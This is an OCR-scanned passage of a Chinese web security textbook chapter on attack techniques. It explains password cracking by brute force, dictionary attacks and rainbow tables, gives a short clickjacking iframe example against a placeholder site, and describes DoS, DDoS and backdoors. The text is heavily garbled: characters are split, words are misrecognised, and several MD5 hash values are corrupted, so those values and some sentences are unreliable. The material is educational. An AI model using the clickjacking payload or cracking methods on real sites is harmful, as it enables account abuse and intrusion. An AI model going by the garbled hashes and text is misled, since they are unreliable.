山 根据 警方 的 调查 统计 ， 成功 入 侵 率 有 6.7%。 平成 23 年 (2011 年 ) 公布 的 非 
法 访问 行为 的 具体 发 生 状 况 请 参见 http:/www.npa.go.jp/cyber/statics/h23/ 
pdf040.pdf 
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列 函 数 做 散 列 处 理 或 加 salt 的 手段 对 要 保存 的 密码 本 身 加 密 。 那 即使 攻 
击 者 使 用 某 些 手段 窃取 密码 数据 ， 如 果 想 要 真正 使 用 这 些 密码 ， 则 必须 
先 通 过 解码 等 手段 ， 把 加 密 处 理 的 密码 还 原 成 明文 形式 。 
(中 密码 注册 时 

原来 的 密码 散 列 函数 以 散 列 值 保存 


abc MD5 900150983cq24ib008696317d238617172 














服务 器 端 只 保存 散 列 值 ， 不 保存 原来 的 明文 密码 。 
在 生成 散 列 值 时 , 使 用 加 salt 或 扩展 密码 长 度 的 安全 策略 





(DO) 认证 时 
试 错 用 的 字符 串 散 列 函数 跟 人 中 中 保存 的 散 列 值 匹 配 


abc MD5 900150983cgq24i1b60d696317d28e 17172 








如 果 (2) 的 散 列 值 和 \ 中 的 保存 的 字符 串 匹 配 一 致 则 表明 认证 成 功 





图 : 破解 已 加 密 的 密码 
从 加 密 过 的 数据 中 导出 明文 通 第 有 以 下 几 种 方法 。 


e@ 通过 穷 举 法 . 字典 攻击 进行 类 推 
e@ 彩虹 表 

e@ 拿 到 密 钥 

e 加 密 算法 的 漏洞 


通过 穷 举 法 * 字典 攻击 进行 类 推 

针对 密码 使 用 散 列 函数 进行 加 密 处 理 的 情况 ， 采 用 和 穷 举 法 或 字典 
攻击 相同 的 手法 ， 演 试 调用 相同 的 散 列 函数 加 密 修 选 密码 ， 然 后 把 计算 
出 的 散 列 值 与 目标 散 列 值 匹配 ， 类 推出 密码 。 
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攻击 者 拿 到 的 散 列 值 
900150983cd24fb0d6963f7d28e17f72 






调用 散 列 函数 对 候选 密码 进行 散 列 处 理 后 类 推 














a 一 一 一 -一 Occ175b9c0f1b6a831c399e269772661 
b 一 -一 -> 92ebbffee6ae2fec3ad/71c777531578f 
C 一 -一 — > 4a8a08f09d37pb73795649038408b5f33 
i 散 列 函数 > 
abc 一 MD5 —» 900150983cd24fb0d6963f7d28e17f72 
BN | | 02441dd7f66c49c82cef55354f467149 
ZZZZ _ | | 02c425157ecd32f259548b33402ff6d3 
图 : 破解 已 加 密 的 密码 / 通过 穷 举 法 . 字典 攻击 进行 类 推 
彩虹 表 


彩虹 表 ( Rainbow Table ) 是 由 明文 密码 及 与 之 对 应 的 散 列 值 构成 的 
“6 一 张 数据 库 表 ， 是 一 种 通过 事先 制作 庞大 的 彩虹 表 ， 可 在 穷 举 法 。 字 典 
攻击 等 实际 破解 过 程 中 红 短 消耗 时 间 的 技巧 。 从 彩虹 表 内 搜索 散 列 值 束 

可 以 推导 出 对 应 的 明文 密码 。 


从 彩虹 表 搜 索 散 歼 值 推导 出 明文 














明文 散 列 值 ( MD5 ) 
a Occ175b9c0f1b6a831c399e269772661 
b 92eb5bffee6ae2fec3ad71c777531578f 





aa 4124bc0a9335c27f086f24ba207a4912 
pass1234 b4af804009cb036a4ccdc33431ef9ac9 









彩虹 表 : 预先 已 收集 的 明文 与 散人 询 值 的 匹配 表 


: 破解 已 加 密 的 密码 / 彩虹 表 


为 了 提高 攻击 成 功率 ， 拥 有 一 张 海 量 数据 的 彩虹 表 就 成 了 必 不 可 少 的 
条 件 。 例 如 在 Free Rainbow Tables 网 站 上 ( http://www.freerainbowtables. 
com/en/tables2/ ) 公布 的 一 张 由 大 小 写字 母 及 数字 全 排列 的 1~8 位 字符 











图 灵 社 区 会 员 Dylan.Y(yuanlongyoung@gmail.com) 专 享 尊重 版 权 


第 11 章 Web 的 攻击 技术 


串 对 应 的 MD5 散 列 值 构成 的 彩虹 表 ， 其 大 小 约 为 1050 吉 子 市 。 


拿 到 密 钥 
使 用 共 至 密 钥 加 密 方 式 对 密码 数据 进行 加 密 处 理 的 情况 下 ， 如 琳 能 
通过 某 种 手段 拿 到 加 密使 用 的 密 铀 ， 也 就 可 以 对 密码 数据 解密 了 。 


加 密 算 法 的 漏洞 

考虑 到 加 密 算法 本 号 可 能 存在 的 漏洞 ， 利 用 该 源 洞 尝试 解密 也 是 一 
种 可 行 的 方法 。 但 是 要 找到 那些 已 广泛 使 用 的 加 密 算 法 的 漏洞 ， 又 谈 何 容 
多 ， 因 此 困难 极 大 ， 不 多 成 功 。 

而 Web 应 用 开发 者 独立 实现 的 加 密 算 法 ， 想 必 疝 未 经 过 充分 的 验证 ， 
还 是 很 有 可 能 存在 漏洞 的 。 


11.5.2 ”点 击 劫持 
点 击 支持 ( Clickjacking ) 是 指 利用 透明 的 按钮 或 链接 做 成 陷阱 ， 禾 
盖 在 Web 页 面 之 上 。 人 然后 户 使 用 户 在 不 知情 的 情况 下 ， 点 击 那 个 链接 
访问 内 容 的 一 种 攻击 手段 。 这 种 行为 义 称 为 界面 伪装 ( UI Redressing )。 
已 设置 陷阱 的 Web 页面， 表面 上 内 容 并 无 不 有 ， 但 早已 埋 人 想 让 
用 户 点 击 的 链接 。 当 用 户 点 击 到 透明 的 按钮 时 ， 实 际 上 是 点 击 了 已 指定 
透明 属性 元 素 的 iframe 页 面 。 




















图 点 击 动 持 的 攻击 案例 

下 面 以 SNS 网 站 的 注销 功能 为 例 ， 讲 解 点 击 劫持 攻击 。 利 用 该 注 
销 功能 ， 注 册 登 录 的 SNS 用 户 只 需 点 击 注销 按钮 ， 就 可 以 从 SNS 网 站 
上 注销 目 己 的 会 员 刁 份 。 
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用 透明 层 履 盖 目 标 网 站 





从 表面 上 看 ,这些 网 站 ( 游戏 网 站 ) 疫 有 什么 不 正 靖 的 地 方 


图 : 点 击 劫持 
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攻击 者 在 预料 用 户 会 点 击 的 Web 页 面 上 设 下 陷阱 。 上 图 中 钓鱼 游 
戏 页 面 上 的 PLAY 按钮 就 是 这 类 陷阱 的 实例 。 

在 做 过 手脚 的 Web 页 面 上 ， 目 标的 SNS 注销 功能 页 面 将 作为 透明 
层 履 盖 在 游戏 网 页 上 。 禾 盖 时 ， 要 保证 PLAY 按钮 与 注销 按钮 的 页 面 所 
在 位 置 保持 一 致 。 


iframe 页 面 中 使 用 透明 可 点 击 按钮 的 示例 


<iframe id="target" src="http://sns.example.jp/leave" StylLe= 一 
"opacity:0;filter:alpha (opacity=0)"></iframe> 

<button style="position:absolute;top:100;left:100;z-index:-1">PLAYD> 
</button> 


由 于 SNS 网 站 作为 透明 层 被 覆盖 ，SNS 网 站 上 处 于 登录 状态 的 用 
户 访 问 这 个 钓鱼 网 站 并 点 击 页 面 上 的 PLAY 按钮 之 后 ， 等 同 于 点 击 了 
SNS 网 站 的 注销 按钮 。 
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11.5.3 ”DoS 攻击 


DoS 攻击 ( Denial of Service attack ) 是 一 种 让 运行 中 的 服务 呈 人 停止 
状态 的 攻击 。 有 时 也 叫做 服务 停止 攻击 或 拒绝 服务 攻击 。Dosg 攻击 的 对 
象 不 仅 限 于 Web 网 站 ， 还 包括 网 络 设备 及 服务 大 等 。 

主要 有 以 下 两 种 DoS 攻击 方式 。 


e 集中 利用 访问 请 求 造 成 资源 过 载 ， 资 源 用 尽 的 同时 ， 实 际 上 服务 也 


就 呈 停止 状态 。 
e@ 通过 攻击 安全 漏洞 使 服务 停止 。 








其 中 ， 集 中 利用 访问 请 求 的 DogS 攻击 ， 单 纯 来 讲 就 是 发 送 大 量 的 
合法 请 求 。 服 务 硕 很 难 分 辨 何 为 正常 请 求 ， 何 为 攻击 请 求 ， 因 此 很 难 防 
上 DoS i 


海量 请 求实 际 导致 服务 呈现 停止 状态 0 

















攻击 安全 漏洞 使 服务 停止 


瞄准 会 导致 服务 停止 的 
是 二 一 展开 攻击 


图 : DoS 攻击 











台 计 算 机 发 起 的 DoS 攻击 称 为 DDoS 攻击 ( Distributed Denial of 
Service attack )。DDoS 攻击 通常 利用 那些 感染 病毒 的 计算 机 作为 攻击 者 
的 攻击 跳板 。 
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er 


11.5.4 ”后门 程序 

后 门 程序 (Backdoor ) 是 指 开 发 设置 的 隐藏 入 口 ， 可 不 按 正 稼 步骤 
使 用 受 限 功能 。 利 用 后 门 程序 就 能 够 使 用 原本 受 限 制 的 功能 。 

通常 的 后 门 程序 分 为 以 下 3 种 类 型 。 








e 开发 阶段 作为 Debug 调用 的 后 门 程序 
e@ 开发 者 为 了 自身 利益 植 入 的 后 门 程序 
e 攻击 者 通过 某 种 方法 设置 的 后 门 程序 


可 通过 监视 进程 和 通信 的 状态 发 现 被 植 人 的 后 门 程序 。 但 设 定 在 
Web 应 用 中 的 后 门 程序 ， 由 于 和 正常 使 用 时 区 别 不 大 ， 通 常 很 难 发 现 。 
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